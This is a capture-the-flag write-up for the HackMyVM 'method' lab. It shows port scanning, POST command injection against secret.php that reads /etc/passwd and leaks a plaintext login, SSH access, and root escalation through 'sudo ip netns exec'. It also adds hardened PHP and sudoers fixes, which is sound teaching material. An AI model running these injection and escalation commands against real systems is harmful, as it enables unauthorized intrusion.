hack-my-vm:method

Method

Port scanning

kali@kali [~] ➜  sudo nmap -p- -sT --min-rate 1000 192.168.1.236                                                                                 [21:13:15]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-25 21:16 CST
Nmap scan report for 192.168.1.236
Host is up (0.0022s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:1F:7F:13 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds

Port 80

kali@kali [~] ➜  sudo  dirsearch -u "http://192.168.1.236/"                                                                                      [21:26:06]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.1.236/__25-01-25_21-27-07.txt

Target: http://192.168.1.236/

[21:27:07] Starting:
[21:27:48] 200 - 344B - /index.htm
[21:28:10] 200 - 285B - /sitemap.xml

Task Completed

/sitemap.xml didn't contain anything useful, so let's look at /index.htm instead.

Here we find a PHP file: the request method is GET and the parameter name is HackMyVM. Let's try requesting it.

kali@kali [~] ➜  curl "http://192.168.1.236/secret.php?HackMyVM=id"                                                                              [21:31:21]
Now the main part what it is loooooool<br>Try other method

This gives us a hint: try a different request method.

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=id'                                                                 [21:35:04]
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>

We get output back, so this is most likely command execution. Let's read another file to confirm.

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=cat /etc/passwd'                                                    [21:36:19]
You Found ME : - (<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
prakasaka:x:1000:1000:prakasaka,,,:/home/prakasaka:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

There is a user named prakasaka, and when we read secret.php itself we find a leaked password.

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=cat secret.php'                                                     [21:36:25]
You Found ME : - (<pre><?php
if(isset($_GET['HackMyVM'])){
echo "Now the main part what it is loooooool";
echo "<br>";
echo "Try other method";
die;
}
if(isset($_POST['HackMyVM'])){
echo "You Found ME : - (";
echo "<pre>";
$cmd = ($_POST['HackMyVM']);
system($cmd);
echo "</pre>";
die;
}
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg");
}
$ok="prakasaka:th3-!llum!n@t0r";
?>
</pre>
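The root cause is visible in the source above: whatever arrives in `$_POST['HackMyVM']` is handed to `system()` unchanged, so the endpoint is an unauthenticated command-execution primitive running as www-data, and the same file also ships a credential in a string literal. The following is an added example written for this page, not the VM's own code: a hardened rewrite of the same endpoint that never builds a shell command from request data. The action names `whoami` and `uptime` and the binary paths are assumptions chosen for illustration.

```php
<?php
// Added example, not the VM's secret.php: a hardened version of the endpoint.
// Design: the client may only send an action *name*; each name maps to a fixed
// argv that is executed without a shell, so no request data is ever parsed by
// /bin/sh. No credentials live in this file.

declare(strict_types=1);

// Allowlist of actions (assumed for this example). Keys are the only values a
// client may submit; values are complete argument vectors.
const ALLOWED_ACTIONS = [
    'whoami' => ['/usr/bin/whoami'],
    'uptime' => ['/usr/bin/uptime'],
];

/**
 * Run one allowlisted action and return its stdout, or null if the action is
 * unknown or could not be started.
 */
function run_allowed(string $action): ?string
{
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return null;
    }
    $argv = ALLOWED_ACTIONS[$action];
    // Passing an array to proc_open (PHP >= 7.4) executes the program directly,
    // bypassing the shell, so metacharacters have no meaning here even if the
    // allowlist were ever loosened.
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_POST['HackMyVM'])) {
    http_response_code(405);
    exit;
}

$result = run_allowed((string) $_POST['HackMyVM']);
if ($result === null) {
    http_response_code(400);
    echo 'unknown action';
    exit;
}
// Escape the output before placing it inside HTML so program output cannot
// inject markup into the page.
echo '<pre>' . htmlspecialchars($result, ENT_QUOTES, 'UTF-8') . '</pre>';
```

If the endpoint genuinely needs to take free-form arguments, the same pattern holds: keep the program fixed, validate each argument against a strict pattern, and pass it as a separate argv element rather than concatenating it into a command string. Secrets such as the `$ok` line belong in configuration outside the web root, never in a file the application can read back to a client.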

So we can just log in with it. Actually, before reading this file I had tried to download a file with wget, but it failed because of insufficient permissions.

kali@kali [~] ➜  curl -X POST "http://192.168.1.236/secret.php" -d 'HackMyVM=ls -la'                                                             [21:37:34]
You Found ME : - (<pre>total 7264
drwxr-xr-x 2 root root 4096 Oct 23 2021 .
drwxr-xr-x 3 root root 4096 Oct 23 2021 ..
-rw-r--r-- 1 root root 5325119 May 6 2021 hacker.gif
-rw-r--r-- 1 root root 344 Oct 23 2021 index.htm
-rw-r--r-- 1 root root 3690 Oct 23 2021 index.html
-rw-r--r-- 1 root root 23 Oct 23 2021 note.txt
-rw-r--r-- 1 root root 2078389 Nov 30 2020 office.gif
-rw-r--r-- 1 root root 471 Oct 23 2021 secret.php
-rw-r--r-- 1 root root 285 Oct 23 2021 sitemap.xml

Remote login and privilege escalation

kali@kali [~] ➜  ssh prakasaka@192.168.1.236                                                                                                     [21:47:55]
prakasaka@192.168.1.236's password:
Linux method 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jan 25 07:59:42 2025 from 192.168.1.4
prakasaka@method:~$ ls
uSeR.txt
prakasaka@method:~$ whoami
prakasaka
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip
prakasaka@method:~$

We find commands that can be run through sudo; a quick look at the documentation gives us the privilege escalation.

prakasaka@method:~$ sudo /bin/ip netns add fuu
prakasaka@method:~$ sudo /bin/ip netns exec fuu /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
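For the defender, the lesson is in the two `sudo -l` entries above rather than in the shell that followed. `ip netns exec` runs an arbitrary program as the user sudo switched to, so a rule that grants all of `/bin/ip` as root is a root shell in disguise; and `(!root) NOPASSWD: /bin/bash` lets the user become every other account on the box without a password. The following is an added example, not the VM's actual `/etc/sudoers`: the two rules as they would appear in sudoers syntax, followed by a corrected version. The read-only subcommands listed in the corrected rule are an assumption about what the account actually needs.

```sudoers
# Added example, not the VM's real /etc/sudoers.
# The two rules reported by "sudo -l" above, in sudoers syntax:
prakasaka ALL=(!root) NOPASSWD: /bin/bash
prakasaka ALL=(root) /bin/ip

# Why they are dangerous:
#   /bin/ip         "ip netns exec <ns> <program>" runs <program> as root, so
#                   granting the whole binary is equivalent to granting root.
#   (!root) bash    a negated user list still allows every non-root account
#                   (www-data, backup, ...) to be reached without a password.

# Corrected rules. Listing the full argument vector makes sudo match the
# command only with exactly those arguments, so "ip netns exec ..." no longer
# matches. The subcommands below are assumed; grant only what is required.
prakasaka ALL=(root) NOPASSWD: /bin/ip addr show, /bin/ip link show, /bin/ip route show

# The bash rule is removed entirely. If another account must be reachable,
# name that account and the specific program instead of using "!root":
# prakasaka ALL=(www-data) /usr/bin/some-tool
```

Edit sudoers only with `visudo`, which syntax-checks the file before saving, and re-run `sudo -l` as the affected user afterwards to confirm that only the intended argument forms are accepted. Arguments with wildcards (`/bin/ip addr show *`) reopen the problem, because sudo's wildcard matching spans whitespace; exact argument lists are the safe form.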